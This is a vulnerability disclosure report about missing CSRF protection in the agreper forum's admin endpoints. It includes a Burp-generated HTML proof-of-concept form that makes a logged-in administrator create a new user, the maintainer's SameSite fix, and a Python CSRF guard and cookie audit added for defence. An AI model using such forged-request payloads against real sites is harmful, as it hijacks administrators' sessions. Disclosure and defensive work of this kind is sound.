Anti-CSRF mechanism is not present in demindiro/agreper
Jan 24th 2023
The application's state-changing admin endpoints (for example POST /admin/user/new/) have no anti-CSRF protection: the forms carry no CSRF token and the session cookie is issued without a SameSite attribute, so a page under the attacker's control can make a logged-in administrator's browser submit requests on the administrator's behalf.
Proof of Concept
- Log in as admin.
- Open the following HTML file in the browser. This is equivalent to the victim clicking a link sent by an attacker.
```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/admin/user/new/" method="POST">
      <input type="hidden" name="name" value="csrf" />
      <input type="hidden" name="password" value="password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
- Click the button. (A real attacker page would submit the form automatically from script instead of waiting for a click.)
- A new user named csrf with password password is created in the victim's forum.
An attacker can force a victim who is logged in as an administrator to perform admin actions such as:
- Creating a new user
- Changing a user's role
We are processing your report and will contact the demindiro/agreper team within 24 hours. 2 months ago
David Hoppenbrouwers validated this vulnerability 2 months ago
Apparently Flask doesn't set SameSite by default.
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax' resolves this issue.
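Setting SESSION_COOKIE_SAMESITE to Lax closes the vector shown in the PoC, but it is a browser-side control: it does nothing for GET handlers that change state, it treats sibling subdomains as same-site, and browsers that default unset cookies to Lax still make exceptions (Chrome allows a top-level cross-site POST to carry a cookie for two minutes after it was set) while others apply no default at all. The example below is added here and is not agreper's code or a Flask extension; it uses only the Python standard library. It does two things a reviewer of the fix would want: audit a Set-Cookie header for the SameSite attribute (to verify the fix from outside, e.g. on the response to the login request), and gate a state-changing POST the way a framework-neutral CSRF guard would, with a Sec-Fetch-Site/Origin/Referer check plus a per-session synchronizer token. All function names, the sample headers, cookies and session dictionary are assumptions made for the example.

```python
"""Added example for this report; not code from agreper, no Flask dependency.
Function names, sample headers and cookies below are constructed for the example."""
import hmac
import secrets
from http.cookies import SimpleCookie


def audit_session_cookie(set_cookie_header, name="session"):
    """Return (ok, reason) for one Set-Cookie header line.

    Flask only emits SameSite when SESSION_COOKIE_SAMESITE is configured, so a
    header without the attribute is the state this report describes.
    """
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    if name not in jar:
        return False, "no %r cookie in header" % name
    morsel = jar[name]
    samesite = morsel["samesite"].lower()   # "" when the attribute is absent
    if samesite not in ("lax", "strict"):
        return False, "SameSite missing or None: a cross-site POST will carry the cookie"
    if not morsel["httponly"]:
        return False, "HttpOnly missing"
    return True, "SameSite=%s" % morsel["samesite"]


def is_cross_site(headers, allowed_origin):
    """Decide from fetch metadata, Origin or Referer whether a browser sent this
    request from another site.  Returns None when no header says either way
    (non-browser clients), so the caller must still require the token."""
    h = {k.lower(): v for k, v in headers.items()}
    if "sec-fetch-site" in h:
        # Only same-origin is accepted for state changes; accepting "same-site"
        # would let any sibling subdomain forge requests.
        return h["sec-fetch-site"] != "same-origin"
    if "origin" in h:                        # "null" for pages opened from file://
        return h["origin"] != allowed_origin
    if "referer" in h:
        return not h["referer"].startswith(allowed_origin + "/")
    return None


def issue_csrf_token(session):
    """Synchronizer token: random per session, kept server side and echoed back
    as a hidden field in every state-changing form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def authorize_state_change(headers, form, session, allowed_origin):
    """Gate for a POST handler such as /admin/user/new/; returns (allowed, reason).
    Both checks must pass: provenance (when the browser supplies it) and token."""
    if is_cross_site(headers, allowed_origin):
        return False, "cross-site request"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Encode so compare_digest cannot raise on non-ASCII attacker input.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample data (not captured from the application).
ORIGIN = "http://localhost:8000"
VULNERABLE_COOKIE = "session=abc123; HttpOnly; Path=/"
FIXED_COOKIE = "session=abc123; HttpOnly; Path=/; SameSite=Lax"
# What the browser sends when Burp's PoC page is opened from disk.
POC_HEADERS = {"Origin": "null", "Sec-Fetch-Site": "cross-site"}
POC_FORM = {"name": "csrf", "password": "password"}

if __name__ == "__main__":
    print("vulnerable cookie:", audit_session_cookie(VULNERABLE_COOKIE))
    print("fixed cookie:     ", audit_session_cookie(FIXED_COOKIE))
    session = {}
    token = issue_csrf_token(session)
    print("PoC request:      ", authorize_state_change(POC_HEADERS, POC_FORM, session, ORIGIN))
    legit_headers = {"Origin": ORIGIN, "Sec-Fetch-Site": "same-origin"}
    legit_form = dict(POC_FORM, csrf_token=token)
    print("admin's own form: ", authorize_state_change(legit_headers, legit_form, session, ORIGIN))
```

The PoC request fails the guard twice over (cross-site provenance and no token), so even a browser that ignores SameSite cannot be used to create the user, while the administrator's own form, which carries the token, is accepted.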
bAu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Hoppenbrouwers marked this as fixed in 0.1.1b with commit 09f56b 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE